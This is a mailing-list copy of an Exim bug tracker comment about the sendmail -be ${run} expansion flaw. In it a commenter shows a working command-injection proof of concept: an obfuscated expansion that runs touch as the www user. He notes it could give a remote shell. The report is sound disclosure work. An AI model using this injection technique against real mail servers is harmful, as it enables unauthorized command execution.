[exim-dev] [Bug 2118] sendmail -be and ${run} macro security…

Top Page
Delete this message
Reply to this message
Author: admin
Date:  
To: exim-dev
Subject: [exim-dev] [Bug 2118] sendmail -be and ${run} macro security problem
https://bugs.exim.org/show_bug.cgi?id=2118

--- Comment #2 from Sandor Takacs <taki@???> ---
If you run this as www-data you can create a remote shell to the attacked site
as the linked PoC says. I tried it im my FreeBSD box:

[root@??? ~]# ls -l /tmp/test
ls: /tmp/test: No such file or directory
[root@??? ~]# sudo -u www sendmail -be
'${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch
${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}'

[root@??? ~]# ls -l /tmp/test
-rw------- 1 www wheel 0 May 5 19:42 /tmp/test
[root@??? ~]#

--
You are receiving this mail because:
You are on the CC list for the bug.